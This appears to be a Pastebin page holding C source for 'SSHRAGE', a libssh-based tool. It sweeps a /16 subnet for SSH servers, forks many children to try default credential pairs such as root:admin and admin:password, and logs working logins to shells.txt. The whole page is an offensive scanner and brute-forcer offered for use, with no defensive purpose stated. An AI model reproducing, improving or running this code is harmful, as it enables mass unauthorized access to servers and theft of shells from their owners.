Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Code:
- /*
- * Prwning ssh range scanner for weak passwd :P You need libssh
- */
- #include <stdio.h>
- #include <unistd.h>
- #include <stdlib.h>
- #include <string.h>
- #include <termios.h>
- #include <sys/select.h>
- #include <sys/time.h>
- #include <signal.h>
- #include <errno.h>
- #include <libssh/libssh.h>
- #include <libssh/sftp.h>
- #include <arpa/inet.h>
- #include <stdio.h>
- #include <netdb.h>
- #include <string.h>
- #include <fcntl.h>
- #include <unistd.h>
- #include <time.h>
- #include <stdlib.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <sys/wait.h>
- #include <netinet/in.h>
- #define TIME 5
- FILE *fp;
- FILE *pf;
- int flag;
- int sockett, a, b, c, d;
- struct hostent *he;
- int MAXCHILDS;
- int porta = 22;
- int childs = 0;
- char host[BUFSIZ];
- char banner[1024];
- int sock3(int porta, char host[BUFSIZ])
- {
- int lola;
- char log[512];
- char buf[1024];
- struct sockaddr_in sin;
- void timeout() {
- close (sockett);
- }
- signal (SIGALRM, (void *) timeout);
- alarm (TIME);
- he = gethostbyname (host);
- lola = inet_addr (host);
- sockett = socket (AF_INET, SOCK_STREAM, 0);
- sin.sin_family = AF_INET;
- sin.sin_port = htons (porta);
- bcopy (he->h_addr, (char *) &sin.sin_addr, he->h_length);
- if (connect (sockett, (struct sockaddr *) &sin, sizeof (sin)) == 0) {
- read(sockett, buf, sizeof(buf));
- if (strstr(buf, banner)) {
- printf("[+] Found ip %s running %s", host, buf);
- sshforce(host);
- }
- close (sockett);
- return;
- }
- }
- int child()
- {
- if (childs >= MAXCHILDS)
- {
- (void) wait (NULL);
- --childs;
- }
- switch (fork ())
- {
- case 0:
- sock3 (porta, host);
- exit (0);
- break;
- case -1:
- printf ("[-] Error creating child processes\n");
- exit (-1);
- break;
- default:
- childs++;
- break;
- }
- }
- void checkauth(char *user,char *password,char *host) {
- char warn[125]="";
- SSH_SESSION *session;
- SSH_OPTIONS *options;
- int argc=1;
- char *argv[]={"none"};
- alarm(10);
- options=ssh_getopt(&argc,argv);
- options_set_username(options,user);
- options_set_host(options,host);
- session=ssh_connect(options);
- if(!session) return ;
- if(ssh_userauth_password(session,NULL,password) != SSH_AUTH_SUCCESS) {
- ssh_disconnect(session);
- return;
- }
- printf("[+] Found shell at ip %s with username %s and password %s\n",host , user,password);
- FILE *vuln = fopen ("shells.txt", "a+");
- fprintf (vuln, "%s:%s@%s\n", user, password, host );
- fclose (vuln);
- return;
- }
- int sshforce(char *iptoforce) {
- printf("[+] Now checking ip %s\n", iptoforce);
- char buff[1024];
- int numforks;
- int maxf=10;
- if (!(fork())) {
- //child
- checkauth("root","admin",iptoforce);
- checkauth("root","password",iptoforce);
- checkauth("root","login",iptoforce);
- checkauth("guest","guest",iptoforce);
- checkauth("admin","admin",iptoforce);
- checkauth("admin","password",iptoforce);
- printf("[+] Done checking %s for weak passwords\n", iptoforce);
- exit(0);
- }
- else {
- //parent
- numforks++;
- if (numforks > maxf)
- for (numforks; numforks > maxf; numforks--)
- wait(NULL);
- }
- }
- int main (int argc, char *argv[]) {
- if(argc != 3) {
- printf("..:: SSHRAGE by PwNz-iNk A.K.A PwNztAr ::..\n");
- printf("Usage %s <subnet> <threads>\n", argv[0]);
- printf("Example %s 192.168 50\n", argv[0]);
- return 0;
- }
- strcpy(banner, "SSH");
- MAXCHILDS= atoi(argv[2]);
- char *subnet = argv[1];
- int i = 0;
- int j;
- printf("[+] Start scanning...\n");
- while(i<255) {
- for(j=1;j<255;j++) {
- sprintf(host,"%s.%d.%d",subnet,i,j);
- child();
- }
- i++;
- }
- printf("[+] Done\n");
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement